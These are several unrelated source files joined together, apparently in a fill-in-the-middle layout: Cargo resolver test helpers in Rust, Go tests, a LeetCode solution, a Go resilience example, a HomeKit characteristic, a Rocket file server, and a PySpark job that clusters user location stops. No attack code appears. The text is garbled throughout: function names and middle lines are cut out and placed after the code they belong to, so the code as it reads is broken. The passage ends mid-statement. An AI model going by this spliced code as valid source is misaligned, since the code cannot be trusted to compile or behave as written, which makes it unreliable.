let mut dep = dep_req(name, req);
dep.set_kind(kind);
dep.set_public(public);
dep
}
pub fn dep_loc(name: &str, location: &str) -> Dependency {
let url = location.into_url().unwrap();
let master = GitReference::Branch("master".to_string());
let source_id = SourceId::for_git(&url, master).unwrap();
Dependency::parse_no_deprecated(name, Some("1.0.0"), source_id).unwrap()
}
pub fn dep_kind(name: &str, kind: Kind) -> Dependency {
dep(name).set_kind(kind).clone()
}
pub fn registry(pkgs: Vec<Summary>) -> Vec<Summary> {
pkgs
}
pub fn names<P: ToPkgId>(names: &[P]) -> Vec<PackageId> {
names.iter().map(|name| name.to_pkgid()).collect()
}
pub fn loc_names(names: &[(&'static str, &'static str)]) -> Vec<PackageId> {
names
.iter()
.map(|&(name, loc)| pkg_id_loc(name, loc))
.collect()
}
/// By default `Summary` and `Dependency` have a very verbose `Debug` representation.
/// This replaces with a representation that uses constructors from this file.
///
/// If `registry_strategy` is improved to modify more fields
/// then this needs to update to display the corresponding constructor.
pub struct PrettyPrintRegistry(pub Vec<Summary>);
impl fmt::Debug for PrettyPrintRegistry {
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
write!(f, "vec![")?;
for s in &self.0 {
if s.dependencies().is_empty() {
write!(f, "pkg!((\"{}\", \"{}\")),", s.name(), s.version())?;
} else {
write!(f, "pkg!((\"{}\", \"{}\") => [", s.name(), s.version())?;
for d in s.dependencies() {
if d.kind() == Kind::Normal
&& &d.version_req().to_string() == "*"
&& !d.is_public()
{
write!(f, "dep(\"{}\"),", d.name_in_toml())?;
} else if d.kind() == Kind::Normal && !d.is_public() {
write!(
f,
"dep_req(\"{}\", \"{}\"),",
d.name_in_toml(),
d.version_req()
)?;
} else {
write!(
f,
"dep_req_kind(\"{}\", \"{}\", {}, {}),",
d.name_in_toml(),
d.version_req(),
match d.kind() {
Kind::Development => "Kind::Development",
Kind::Build => "Kind::Build",
Kind::Normal => "Kind::Normal",
},
d.is_public()
)?;
}
}
write!(f, "]),")?;
}
}
write!(f, "]")
}
}
#[test]
fn | () {
assert_eq!(
&format!(
"{:?}",
PrettyPrintRegistry(vec![
pkg!(("foo", "1.0.1") => [dep_req("bar", "1")]),
pkg!(("foo", "1.0.0") => [dep_req("bar", "2")]),
pkg!(("foo", "2.0.0") => [dep_req("bar", "*")]),
pkg!(("bar", "1.0.0") => [dep_req("baz", "=1.0.2"),
dep_req("other", "1")]),
pkg!(("bar", "2.0.0") => [dep_req("baz", "=1.0.1")]),
pkg!(("baz", "1.0.2") => [dep_req("other", "2")]),
pkg!(("baz", "1.0.1")),
pkg!(("cat", "1.0.2") => [dep_req_kind("other", "2", Kind::Build, false)]),
pkg!(("cat", "1.0.3") => [dep_req_kind("other", "2", Kind::Development, false)]),
pkg!(("dep_req", "1.0.0")),
pkg!(("dep_req", "2.0.0")),
])
),
"vec![pkg!((\"foo\", \"1.0.1\") => [dep_req(\"bar\", \"^1\"),]),\
pkg!((\"foo\", \"1.0.0\") => [dep_req(\"bar\", \"^2\"),]),\
pkg!((\"foo\", \"2.0.0\") => [dep(\"bar\"),]),\
pkg!((\"bar\", \"1.0.0\") => [dep_req(\"baz\", \"= 1.0.2\"),dep_req(\"other\", \"^1\"),]),\
pkg!((\"bar\", \"2.0.0\") => [dep_req(\"baz\", \"= 1.0.1\"),]),\
pkg!((\"baz\", \"1.0.2\") => [dep_req(\"other\", \"^2\"),]),\
pkg!((\"baz\", \"1.0.1\")),\
pkg!((\"cat\", \"1.0.2\") => [dep_req_kind(\"other\", \"^2\", Kind::Build, false),]),\
pkg!((\"cat\", \"1.0.3\") => [dep_req_kind(\"other\", \"^2\", Kind::Development, false),]),\
pkg!((\"dep_req\", \"1.0.0\")),\
pkg!((\"dep_req\", \"2.0.0\")),]"
)
}
/// This generates a random registry index.
/// Unlike vec((Name, Ver, vec((Name, VerRq), ..), ..)
/// This strategy has a high probability of having valid dependencies
pub fn registry_strategy(
max_crates: usize,
max_versions: usize,
shrinkage: usize,
) -> impl Strategy<Value = PrettyPrintRegistry> {
let name = string_regex("[A-Za-z][A-Za-z0-9_-]*(-sys)?").unwrap();
let raw_version = ..max_versions.pow(3);
let version_from_raw = move |r: usize| {
let major = ((r / max_versions) / max_versions) % max_versions;
let minor = (r / max_versions) % max_versions;
let patch = r % max_versions;
format!("{}.{}.{}", major, minor, patch)
};
// If this is false than the crate will depend on the nonexistent "bad"
// instead of the complex set we generated for it.
let allow_deps = prop::bool::weighted(0.99);
let list_of_versions =
btree_map(raw_version, allow_deps, 1..=max_versions).prop_map(move |ver| {
ver.into_iter()
.map(|a| (version_from_raw(a.0), a.1))
.collect::<Vec<_>>()
});
let list_of_crates_with_versions =
btree_map(name, list_of_versions, 1..=max_crates).prop_map(|mut vers| {
// root is the name of the thing being compiled
// so it would be confusing to have it in the index
vers.remove("root");
// bad is a name reserved for a dep that won't work
vers.remove("bad");
vers
});
// each version of each crate can depend on each crate smaller then it.
// In theory shrinkage should be 2, but in practice we get better trees with a larger value.
let max_deps = max_versions * (max_crates * (max_crates - 1)) / shrinkage;
let raw_version_range = (any::<Index>(), any::<Index>());
let raw_dependency = (
any::<Index>(),
any::<Index>(),
raw_version_range,
0..=1,
Just(false),
// TODO: ^ this needs to be set back to `any::<bool>()` and work before public & private dependencies can stabilize
);
fn order_index(a: Index, b: Index, size: usize) -> (usize, usize) {
let (a, b) = (a.index(size), b.index(size));
(min(a, b), max(a, b))
}
let list_of_raw_dependency = vec(raw_dependency, ..=max_deps);
// By default a package depends only on other packages that have a smaller name,
// this helps make sure that all things in the resulting index are DAGs.
// If this is true then the DAG is maintained with grater instead.
let reverse_alphabetical = any::<bool>().no_shrink();
(
list_of_crates_with_versions,
list_of_raw_dependency,
reverse_alphabetical,
)
.prop_map(
|(crate_vers_by_name, raw_dependencies, reverse_alphabetical)| {
let list_of_pkgid: Vec<_> = crate_vers_by_name
.iter()
.flat_map(|(name, vers)| vers.iter().map(move |x| ((name.as_str(), &x.0), x.1)))
.collect();
let len_all_pkgid = list_of_pkgid.len();
let mut dependency_by_pkgid = vec![vec![]; len_all_pkgid];
for (a, b, (c, d), k, p) in raw_dependencies {
let (a, b) = order_index(a, b, len_all_pkgid);
let (a, b) = if reverse_alphabetical { (b, a) } else { (a, b) };
let ((dep_name, _), _) = list_of_pkgid[a];
if (list_of_pkgid[b].0).0 == dep_name {
continue;
}
let s = &crate_vers_by_name[dep_name];
let s_last_index = s.len() - 1;
let (c, d) = order_index(c, d, s.len());
dependency_by_pkgid[b].push(dep_req_kind(
dep_name,
&if c == 0 && d == s_last_index {
"*".to_string()
} else if c == 0 {
format!("<={}", s[d].0)
} else if d == s_last_index {
format!(">={}", s[c].0)
} else if c == d {
format!("={}", s[c].0)
} else {
format!(">={}, <={}", s[c].0, s[d].0)
},
match k {
0 => Kind::Normal,
1 => Kind::Build,
// => Kind::Development, // Development has no impact so don't gen
_ => panic!("bad index for Kind"),
},
p && k == 0,
))
}
let mut out: Vec<Summary> = list_of_pkgid
.into_iter()
.zip(dependency_by_pkgid.into_iter())
.map(|(((name, ver), allow_deps), deps)| {
pkg_dep(
(name, ver).to_pkgid(),
if !allow_deps {
vec![dep_req("bad", "*")]
} else {
let mut deps = deps;
deps.sort_by_key(|d| d.name_in_toml());
deps.dedup_by_key(|d| d.name_in_toml());
deps
},
)
})
.collect();
if reverse_alphabetical {
// make sure the complicated cases are at the end
out.reverse();
}
PrettyPrintRegistry(out)
},
)
}
/// This test is to test the generator to ensure
/// that it makes registries with large dependency trees
#[test]
fn meta_test_deep_trees_from_strategy() {
use proptest::strategy::ValueTree;
use proptest::test_runner::TestRunner;
let mut dis = [0; 21];
let strategy = registry_strategy(50, 20, 60);
let mut test_runner = TestRunner::deterministic();
for _ in 0..128 {
let PrettyPrintRegistry(input) = strategy
.new_tree(&mut TestRunner::new_with_rng(
Default::default(),
test_runner.new_rng(),
))
.unwrap()
.current();
let reg = registry(input.clone());
for this in input.iter().rev().take(10) {
let res = resolve(
vec![dep_req(&this.name(), &format!("={}", this.version()))],
®,
);
dis[res
.as_ref()
.map(|x| min(x.len(), dis.len()) - 1)
.unwrap_or(0)] += 1;
if dis.iter().all(|&x| x > 0) {
return;
}
}
}
panic!(
"In 1280 tries we did not see a wide enough distribution of dependency trees! dis: {:?}",
dis
);
}
/// This test is to test the generator to ensure
/// that it makes registries that include multiple versions of the same library
#[test]
fn meta_test_multiple_versions_strategy() {
use proptest::strategy::ValueTree;
use proptest::test_runner::TestRunner;
let mut dis = [0; 10];
let strategy = registry_strategy(50, 20, 60);
let mut test_runner = TestRunner::deterministic();
for _ in 0..128 {
let PrettyPrintRegistry(input) = strategy
.new_tree(&mut TestRunner::new_with_rng(
Default::default(),
test_runner.new_rng(),
))
.unwrap()
.current();
let reg = registry(input.clone());
for this in input.iter().rev().take(10) {
let res = resolve(
vec![dep_req(&this.name(), &format!("={}", this.version()))],
®,
);
if let Ok(mut res) = res {
let res_len = res.len();
res.sort_by_key(|s| s.name());
res.dedup_by_key(|s| s.name());
dis[min(res_len - res.len(), dis.len() - 1)] += 1;
}
if dis.iter().all(|&x| x > 0) {
return;
}
}
}
panic!(
"In 1280 tries we did not see a wide enough distribution of multiple versions of the same library! dis: {:?}",
dis
);
}
/// Assert `xs` contains `elems`
pub fn assert_contains<A: PartialEq>(xs: &[A], elems: &[A]) {
for elem in elems {
assert!(xs.contains(elem));
}
}
pub fn assert_same<A: PartialEq>(a: &[A], b: &[A]) {
assert_eq!(a.len(), b.len());
assert_contains(b, a);
}
| meta_test_deep_pretty_print_registry |
stats_test.go | package app
import (
"testing"
"github.com/stretchr/testify/assert"
)
// generateVote is used to generate a test vote struct
func generateVote() *Vote {
vote := new(Vote)
vote.Votes = make(map[string]string)
vote.Votes["alice"] = "levy"
vote.Votes["bob"] = "depraz"
return vote
}
func TestNewStatistics(t *testing.T) {
v := generateVote()
st := NewStatistics(v)
assert.Equal(t, 2, st.Total)
}
| func TestCreateStats(t *testing.T) {
v := generateVote()
expected := `Total: 2
levy (1): alice
depraz (1): bob
`
assert.Equal(t, expected, createStat(v))
} | |
121. Best Time to Buy and Sell Stock.go | package leetcode
func maxProfit(prices []int) int {
res, dp := 0, make([]int, len(prices))
for i := 1; i < len(prices); i++ {
dp[i] = prices[i] - prices[i-1]
}
for i := 1; i < len(dp); i++ {
if dp[i-1] > 0 {
dp[i] += dp[i-1]
} | }
return res
}
func max(a int, b int) int {
if a > b {
return a
}
return b
} | res = max(res, dp[i]) |
main.go | package main
import (
"context"
"fmt"
"math/rand"
"net/http"
"time"
"github.com/prometheus/client_golang/prometheus"
"github.com/prometheus/client_golang/prometheus/promhttp"
"github.com/slok/goresilience"
"github.com/slok/goresilience/bulkhead"
"github.com/slok/goresilience/circuitbreaker"
"github.com/slok/goresilience/metrics"
"github.com/slok/goresilience/retry"
"github.com/slok/goresilience/timeout"
)
// HystrixConf is the configuration of the hystrix runner.
type HystrixConf struct {
Circuitbreaker circuitbreaker.Config
Bulkhead bulkhead.Config
Retry retry.Config
Timeout timeout.Config
ID string
MetricsRecorder metrics.Recorder
}
// NewHystrix returns a runner that simulates the most used features
// of Netflix Hystrix library.
//
// It is a circuit breaker with a bulkhead, with a retry with timeout,
// in that order.
func NewHystrix(cfg HystrixConf) goresilience.Runner {
// The order of creating a Hystrix runner is:
// measured runners -> circuitbreaker -> bulkhead -> retry -> timeout
hystrixRunner := goresilience.RunnerChain(
metrics.NewMiddleware(cfg.ID, cfg.MetricsRecorder),
circuitbreaker.NewMiddleware(cfg.Circuitbreaker),
bulkhead.NewMiddleware(cfg.Bulkhead),
retry.NewMiddleware(cfg.Retry),
timeout.NewMiddleware(cfg.Timeout),
)
return hystrixRunner
}
type result struct {
err error
msg string
}
func | () {
// Prometheus registry to expose metrics.
promreg := prometheus.NewRegistry()
go func() {
http.ListenAndServe(":8081", promhttp.HandlerFor(promreg, promhttp.HandlerOpts{}))
}()
runner := NewHystrix(HystrixConf{
ID: "hystrix-example",
MetricsRecorder: metrics.NewPrometheusRecorder(promreg),
Bulkhead: bulkhead.Config{
MaxWaitTime: 6 * time.Second,
},
})
results := make(chan result)
// Run a infinite loop executing using our runner.
go func() {
for {
time.Sleep(1 * time.Millisecond)
// Execute concurrently.
go func() {
// Execute our call to the service.
var msg string
err := runner.Run(context.TODO(), func(ctx context.Context) error {
now := time.Now()
// If minute is mod 3 return error directly
if now.Minute()%3 == 0 {
return fmt.Errorf("huge system error")
}
var err error
switch time.Now().Nanosecond() % 10 {
case 0:
msg = "ok"
case 2, 9:
time.Sleep(750 * time.Millisecond)
err = fmt.Errorf("a error")
case 7:
time.Sleep(5 * time.Second)
msg = "ok"
default:
time.Sleep(20 * time.Millisecond)
if rand.Intn(1000)%2 == 0 {
msg = "ok"
} else {
err = fmt.Errorf("another error")
}
}
return err
})
// Send the result to our receiver outside this infinite loop.
results <- result{
err: err,
msg: msg,
}
}()
}
}()
// Process the received executions.
for res := range results {
if res.err != nil {
fmt.Printf("[!] fallback because err received: %s\n", res.err)
} else {
fmt.Printf("[*] all ok: %s\n", res.msg)
}
}
}
| main |
current_media_state.rs | // THIS FILE IS AUTO-GENERATED
use crate::characteristic::{HapType, Characteristic, Inner, Format, Perm, Unit};
/// Current Media State Characteristic.
pub type CurrentMediaState = Characteristic<u8>;
/// Creates a new Current Media State Characteristic.
pub fn new() -> CurrentMediaState {
Characteristic::new(Inner::<u8> {
hap_type: HapType::CurrentMediaState,
format: Format::UInt8,
perms: vec![
Perm::PairedRead,
Perm::Events,
],
unit: Some(Unit::Percentage),
max_value: Some(3),
min_value: Some(0),
step_value: Some(1),
valid_values: Some(vec![
0, // "Play"
1, // "Pause" | })
} | 2, // "Stop"
3, // "Unknown"
]),
..Default::default() |
files.rs | use rocket::response::NamedFile;
use std::io;
use std::path::{Path, PathBuf};
#[get("/")]
fn index() -> io::Result<NamedFile> {
NamedFile::open("static/index.html")
}
#[get("/<file..>", rank = 2)]
fn files(file: PathBuf) -> io::Result<NamedFile> {
NamedFile::open(Path::new("static/").join(file)) | } |
|
stop_user_clusters-v6.py | from __future__ import print_function
from sklearn.cluster import DBSCAN
import argparse
import hashlib
import os
import time
from datetime import date, datetime, timedelta
from functools import reduce
from math import degrees
from concurrent.futures import ThreadPoolExecutor
import concurrent.futures
from azure.storage.blob import BlobServiceClient, BlobClient, ContainerClient, BlobBlock
from azure.core.exceptions import ResourceNotFoundError
from pyspark import SparkContext, SparkConf, SQLContext
from pyspark.sql import DataFrame, SparkSession
import pyspark.sql.functions as F
from pyspark.sql.functions import col, udf
from pyspark.sql.types import *
from pyspark.sql.window import Window
from pyspark import StorageLevel
from pyspark.sql.functions import lag, pandas_udf, PandasUDFType
# import logging
VERSION = 6
#
# Driver settings
#
SHUFFLE_PARTITIONS = 32
OUT_PARTITIONS = 2
CORES = "4"
RAM = "12g"
APP_NAME = "StopUserClusters"
# always set overwrite
WRITE_MODE = "overwrite"
SKIP_EXISTING = False
THREADS = 32
# templates
TABLE_PATH = "wasbs://{}@{}.blob.core.windows.net/{}/"
CONN_STRING = "BlobEndpoint=https://{}.blob.core.windows.net/;SharedAccessSignature={}"
# need leading slash
LOCAL_PATH = "./table/"
#
# Stop locations parameters
#
EVENTS_ROAM_DIST = 70 # meters
STOPS_ROAM_DIST = 65
EARTH_RADIUS = 6372.795 * 1000
MIN_STAY = 5
US_STATES = ['AK', 'AL', 'AR', 'AZ', 'CA', 'CO', 'CT', 'DC', 'DE', 'FL', 'GA', 'HI', 'IA', 'ID', 'IL', 'IN', 'KS', 'KY', 'LA', 'MA', 'MD', 'ME', 'MI', 'MN', 'MO', 'MS',
'MT', 'NC', 'ND', 'NE', 'NH', 'NJ', 'NM', 'NV', 'NY', 'OH', 'OK', 'OR', 'PA', 'PR', 'RI', 'SC', 'SD', 'TN', 'TX', 'UT', 'VA', 'VI', 'VT', 'WA', 'WI', 'WV', 'WY']
def | (spark, paths, format="parquet"):
dfs = None
dfs_array = []
for path in paths:
dfs_load = spark.read.format(format).load(path)
dfs_array.append(dfs_load)
dfs = reduce(DataFrame.unionAll, dfs_array)
return dfs
#
# Stop location lib
#
def add_distance_column(dfs, order_column='timestamp'):
# Radians lat/lon
dfs = dfs.withColumn('latitude2', F.radians('latitude')).withColumn(
'longitude2', F.radians('longitude'))
# Groups GPS locations into chucks. A chunk is formed by groups of points that are distant no more than roam_dist
w = Window.partitionBy(['userID']).orderBy(order_column)
dfs = dfs.withColumn('next_lat', F.lead('latitude2', 1).over(w))
dfs = dfs.withColumn('next_lon', F.lead('longitude2', 1).over(w))
# Haversine distance
dfs = dfs.withColumn('distance_next', EARTH_RADIUS * 2 * F.asin(F.sqrt(
F.pow(F.sin((col('next_lat') - col('latitude2')) / 2.0), 2) + F.cos('latitude2') * F.cos('next_lat') * F.pow(
F.sin((col('next_lon') - col('longitude2')) / 2.0), 2))))
dfs = dfs.withColumn('distance_prev', F.lag('distance_next', default=0).over(w)).drop(
'latitude2').drop('longitude2').drop('next_lon').drop('next_lat').drop('distance_next')
return dfs
def get_destinations(dfs, roam_dist=110, earth_radius=6372.795 * 1000):
"""
Applies DBSCAN to extract the unique stop locations from a pyspark DataFrame
:param x: DataFrame with ['id_client', 'latitude', 'longitude', "from", "to"]. Coordinates are in degrees.
:param roam_dist: The stop location size in meters.
:param earth_radius: The radius of the earth.
:param group_results: If True, it groups by the cluster's location and id_client.
:return: (pyspark DataFrame) If group_results=True: ['id_client', 'clatitude', 'clongitude', 'time_spent', 'frequency']
(pyspark DataFrame) If group_results=False: ['id_client', 'latitude', 'longitude', 'clatitude', 'clongitude', 'from', 'to']
"""
@pandas_udf("userId string, state string, latitude double, longitude double, begin timestamp, end timestamp, clusterId integer", PandasUDFType.GROUPED_MAP)
def get_destinations(df):
"""
Applies DBSCAN to stop locations
:param x: 2D numpy array with latitude and longitude.
:param from_to_array: 2D numpy array with from and to timestamps.
:param roam_dist: The stop location size in meters.
:param earth_radius: The radius of the earth.
:return: (pandas DataFrame) ['latitude', 'longitude', 'clatitude', 'clongitude', 'from', 'to', 'time_spent']
"""
db = DBSCAN(eps=roam_dist/earth_radius, min_samples=1,
algorithm='ball_tree', metric='haversine')
df["clusterId"] = db.fit_predict(df[['latitude', 'longitude']])
return df
dfs = dfs.withColumn('latitude', F.radians('latitude'))
dfs = dfs.withColumn('longitude', F.radians('longitude'))
stops_dfs = dfs.groupby('userId', 'state').apply(get_destinations)
stops_dfs = stops_dfs.withColumn('latitude', F.degrees('latitude'))
stops_dfs = stops_dfs.withColumn('longitude', F.degrees('longitude'))
w = Window().partitionBy('userId', 'clusterId')
stops_dfs = stops_dfs.withColumn(
'clusterLatitude', F.mean('latitude').over(w))
stops_dfs = stops_dfs.withColumn(
'clusterLongitude', F.mean('longitude').over(w))
stops_dfs = stops_dfs.drop('latitude').drop('longitude')
return stops_dfs
#
# Spark
#
def getSparkConfig(cores, ram, partitions, azure_accounts, azure_oauth):
# Setting enviroment variables and various drivers
# "org.apache.hadoop:hadoop-azure:2.10.0" driver Azure
# "io.delta:delta-core_2.12:0.7.0" driver Delta-lake
# "spark.sql.extensions=io.delta.sql.DeltaSparkSessionExtension" configuration Delta
# "spark.sql.catalog.spark_catalog=org.apache.spark.sql.delta.catalog.DeltaCatalog" configuration Delta
# "spark.delta.logStore.class=org.apache.spark.sql.delta.storage.AzureLogStore" configuration Delta
# Set spark environments
os.environ['PYSPARK_PYTHON'] = '/usr/bin/python3'
os.environ['PYSPARK_DRIVER_PYTHON'] = '/usr/bin/python3'
# os.environ["PYSPARK_SUBMIT_ARGS"] = """--packages "org.apache.hadoop:hadoop-azure:3.2.1" pyspark-shell"""
os.environ["PYSPARK_SUBMIT_ARGS"] = """--packages "org.apache.hadoop:hadoop-azure:2.10.0" --jars "/mnt/batch/tasks/shared/sco-mobilitycovid-udf_2.11-1.0.jar","/mnt/batch/tasks/shared/geo-0.7.7.jar" pyspark-shell"""
conf = (
SparkConf()
# SQL
.set("spark.sql.shuffle.partitions", partitions)
.set("spark.sql.csv.filterPushdown.enabled", "false")
# Driver + memory
.set("spark.driver.cores", cores)
.set("spark.shuffle.file.buffer", "1m")
# .set("spark.memory.offHeap.enabled","true")
# .set("spark.memory.offHeap.size","3g")
.set("spark.memory.fraction", "0.8")
.set("spark.memory.storageFraction", "0.2")
.set("spark.io.compression.lz4.blockSize", "128k")
.set("spark.driver.maxResultSize", "0")
.set("spark.driver.memory", ram)
# Local storage for spilling & storing temp files
.set("spark.local.dir", "/mnt/batch/tasks/shared")
# Set master local
.setMaster("local[*]")
# App name
.setAppName(APP_NAME)
)
# Azure (Keys, Filesystem WASBS)
conf.set("spark.hadoop.fs.wasbs.impl",
"org.apache.hadoop.fs.azure.NativeAzureFileSystem")
for account in azure_accounts:
conf.set("fs.azure.sas.{}.{}.blob.core.windows.net".format(account['container'], account['storage']),
account['sas'])
if azure_oauth:
conf.set("spark.hadoop.fs.azure.account.auth.type", "OAuth")
conf.set("spark.hadoop.fs.azure.account.oauth.provider.type",
"org.apache.hadoop.fs.azurebfs.oauth2.ClientCredsTokenProvider")
conf.set("spark.hadoop.fs.azure.account.oauth2.client.id",
azure_oauth['client-id'])
conf.set("spark.hadoop.fs.azure.account.oauth2.client.secret",
azure_oauth['client-secret'])
conf.set("spark.hadoop.fs.azure.account.oauth2.client.endpoint",
azure_oauth['endpoint'])
return conf
#
# Utils
#
def enumerate_prefixes(start=0, end=256):
for i in range(start, end):
yield '{:02x}'.format(i)
def upload_blob(blob_service_client, container_out, blob_key, file_path):
blob_client = blob_service_client.get_blob_client(
container_out, blob_key)
with open(file_path, "rb") as data:
blob_client.upload_blob(data, overwrite=True)
# cleanup
os.remove(file_path)
return blob_key
#
# Argparser
#
def get_args():
"""Parse command line arguments."""
parser = argparse.ArgumentParser(description="Cuebiq data processor")
requiredNamed = parser.add_argument_group('required arguments')
requiredNamed.add_argument(
"--storage", type=str, required=True, help="Azure storage")
requiredNamed.add_argument(
"--sas", type=str, required=True, help="SAS token")
requiredNamed.add_argument(
"--oauth-login", type=str, required=True, help="Oauth login")
requiredNamed.add_argument(
"--oauth-client-id", type=str, required=True, help="Oauth client id")
requiredNamed.add_argument(
"--oauth-client-secret", type=str, required=True, help="Oauth client secret")
requiredNamed.add_argument(
"--container-in", type=str, required=True, help="Input container")
requiredNamed.add_argument(
"--container-out", type=str, required=True, help="Output container")
requiredNamed.add_argument("--country", type=str,
help="Country. Options: 'US','IT'")
requiredNamed.add_argument("--prefix", type=str, help="User prefix")
# optional
parser.add_argument("--vm-cores", default=CORES,
type=str, help="Azure VM cores")
parser.add_argument("--vm-ram", default=RAM,
type=str, help="Azure VM ram")
parser.add_argument("--shuffle-partitions", default=SHUFFLE_PARTITIONS,
type=int, help="Spark shuffle partitions")
parser.add_argument("--roam-dist-stops", type=int,
default=STOPS_ROAM_DIST, help="Roam dist stops")
parser.add_argument("--roam-dist-events", type=int,
default=EVENTS_ROAM_DIST, help="Roam dist events")
parsed_args = parser.parse_args()
return parsed_args
#
# Main function
#
def main():
"""Main function"""
# Get args
args = get_args()
# container
container_in = args.container_in
container_out = args.container_out
# Azure credentials
sas_token = args.sas
storage_account_name = args.storage
azure_accounts = list()
azure_accounts.append({
"storage": storage_account_name,
"sas": sas_token,
"container": container_in
})
azure_accounts.append({
"storage": storage_account_name,
"sas": sas_token,
"container": container_out
})
oauth_login = args.oauth_login
oauth_client_id = args.oauth_client_id
oauth_client_secret = args.oauth_client_secret
# requires hadoop 3.2+
# azure_oauth = {
# "endpoint": oauth_login,
# "client-id": oauth_client_id,
# "client-secret": oauth_client_secret
# }
azure_oauth = False
# VM
cores = args.vm_cores
ram = args.vm_ram
shuffle_partitions = args.shuffle_partitions
# Date, prefix
country = args.country
prefix = args.prefix
# process config
roam_dist_stops = args.roam_dist_stops
roam_dist_events = args.roam_dist_events
# Path in - path out
blob_in = f"wasbs://{container_in}@{storage_account_name}.blob.core.windows.net/stoplocation-v8_prefix_r70-s5-a70-h6/{country}/"
timezones_in = f"wasbs://cuebiq-data@{storage_account_name}.blob.core.windows.net/utils_states_timezones/"
if azure_oauth:
# we can leverage abfss
blob_in = f"abfss://{container_in}@{storage_account_name}.dfs.core.windows.net/stoplocation-v8_prefix_r70-s5-a70-h6/country={country}/"
timezones_in = f"abfss://cuebiq-data@{storage_account_name}.dfs.core.windows.net/utils_states_timezones/"
path_out_distinct = f"distinct_user_clusters-v8_r70-s5-a70-h6_clustered_{roam_dist_stops}m_v{VERSION}/country={country}"
path_out_all = f"all_user_clusters-v8_r70-s5-a70-h6_clustered_{roam_dist_stops}m_v{VERSION}/country={country}"
# config spark
conf = getSparkConfig(cores, ram, shuffle_partitions,
azure_accounts, azure_oauth)
# set prop for handling partition columns as strings (fixes prefixes as int)
conf.set("spark.sql.sources.partitionColumnTypeInference.enabled", "false")
# Create spark session
sc = SparkContext(conf=conf).getOrCreate()
sqlContext = SQLContext(sc)
spark = sqlContext.sparkSession
# register UDF from jar
spark.udf.registerJavaFunction(
"geohash", "it.smartcommunitylab.sco.mobilitycovid.udf.GeohashEncode")
# Init azure client
blob_service_client = BlobServiceClient.from_connection_string(
CONN_STRING.format(storage_account_name, sas_token))
# build keys, date is mandatory, prefix opt
partition_key = f"prefix={prefix}"
print("process "+partition_key)
start_time = time.time()
local_dir = LOCAL_PATH+partition_key
print("write temp to "+local_dir)
# cleanup local if exists
if (os.path.isdir(local_dir)):
map(os.unlink, (os.path.join(local_dir, f)
for f in os.listdir(local_dir)))
# Input dataset
print("read dataset table")
read_time = time.time()
# explode days manually
dates = [
datetime(2020, 1, 1) + timedelta(days=x) for x in range(0, 258)]
blobs_in = ["{}/year={}/month={}/day={}/prefix={}".format(
blob_in, d.year, d.month, d.day, prefix) for d in dates]
#dfs = spark.read.format("parquet").load(*blobs_in)
dfs = read_multiple_df(spark, blobs_in)
dfs_timezones = spark.read.format("parquet").load(timezones_in)
# manually inject prefix column
dfs = dfs.withColumn("prefix", F.lit(prefix))
# apply partition filter
dfs_state = dfs.where(f"prefix = '{prefix}'")
print("processing with spark")
spark_time = time.time()
w = Window().partitionBy('userId').orderBy('begin')
dfs_state = add_distance_column(dfs_state, order_column='begin')
dfs_state = dfs_state.fillna(0, subset=['next_travelled_distance'])
dfs_state = dfs_state.withColumn('lag_next_travelled_distance', F.lag(
col('next_travelled_distance')).over(w))
dfs_state = dfs_state.withColumn('lag_end', F.lag('end').over(w))
dfs_state = dfs_state.withColumn('rn', F.when(((col('lag_next_travelled_distance') != col('prev_travelled_distance')) |
(col('prev_travelled_distance') > 0) |
(col('lag_next_travelled_distance') > 0) |
(col('distance_prev') > roam_dist_events) |
((F.dayofyear(col('begin')) - F.dayofyear(col('lag_end')) == 1) &
(F.hour(col('begin')) < 6))
) &
((col('lag_end').isNull()) | (col('lag_end') < col('begin'))), 1).otherwise(0))
# Remove prev_travelled distance when rn == 0 (it happens when lag_end and begin overlap)
dfs_state = dfs_state.withColumn('prev_travelled_distance', F.when(
col('rn') == 0, 0).otherwise(col('prev_travelled_distance')))
w = Window().partitionBy('userId').orderBy(
'begin').rangeBetween(Window.unboundedPreceding, 0)
dfs_state = dfs_state.withColumn('group', F.sum('rn').over(w))
dfs_state = dfs_state.groupBy('userId', 'group').agg(F.mean('latitude').alias('latitude'),
F.mean('longitude').alias(
'longitude'),
F.min('begin').alias(
'begin'),
F.max('end').alias(
'end'),
F.first('state').alias('state')).drop('group')
# Bug fix: due to the processing we do in the stop events, where we process stops every two days,
# sometimes stop events overlap but they do not get merged until here. The error is RARE. Here we fix it
#
# We divide the two stops making MIN_STAY space between the two, if we can.
w = Window().partitionBy('userId').orderBy('begin')
dfs_state = dfs_state.withColumn('next_begin', F.lead('begin').over(w))
dfs_state = dfs_state.withColumn('next_end', F.lead('end').over(w))
dfs_state = dfs_state.withColumn('end', F.when(
(col('next_begin').cast('long') - col('begin').cast('long') > 2 * MIN_STAY * 60) &
(col('next_begin') < col('end')),
col('next_begin') - F.expr("INTERVAL {} SECONDS".format(MIN_STAY * 60))
).otherwise(col('end')))
dfs_state = dfs_state.drop('next_begin', 'next_end')
dfs_destinations = get_destinations(dfs_state, roam_dist=roam_dist_stops)
dfs_destinations = dfs_destinations.withColumn(
'prefix', dfs_destinations.userId.substr(1, 2))
dfs_destinations = dfs_destinations.withColumn(
'dayofyear', F.dayofyear('begin'))
dfs_destinations = dfs_destinations.withColumn('year', F.year('begin'))
# dfs_destinations = dfs_destinations.withColumn('state', F.lit(state))
# Local time
dfs_destinations.createOrReplaceTempView("dfs_destinations")
dfs_destinations = spark.sql("""
SELECT dfs_destinations.*, geohash(clusterLatitude, clusterLongitude, 7) as geohash7
from dfs_destinations
""")
dfs_destinations = dfs_destinations.withColumn(
'geohash5', F.substring(col('geohash7'), 1, 5))
dfs_destinations = dfs_destinations.join(
F.broadcast(dfs_timezones), on='geohash5').drop('geohash5')
dfs_destinations = dfs_destinations.withColumn(
'local_begin', F.from_utc_timestamp(col('begin'), col('tzid')))
dfs_destinations = dfs_destinations.withColumn('offset', (
(col('local_begin').cast('long') - col('begin').cast('long')) / 3600).cast('int')).drop('local_begin')
dfs_destinations.persist(StorageLevel.DISK_ONLY)
# Write
# output as country/prefix/part1..N
local_dir_all = local_dir + "/all/"
dfs_destinations_all = dfs_destinations.select(
'prefix', 'userId', 'clusterId', 'begin', 'end', 'offset', 'year', 'dayofyear')
dfs_destinations_all.repartition(8, 'dayofyear').write.format('parquet').mode(
'overwrite').save(local_dir_all+"prefix="+prefix+"/")
# output as country/prefix/state
local_dir_distinct = local_dir+"/distinct/"
dfs_destinations_distinct = dfs_destinations.select(
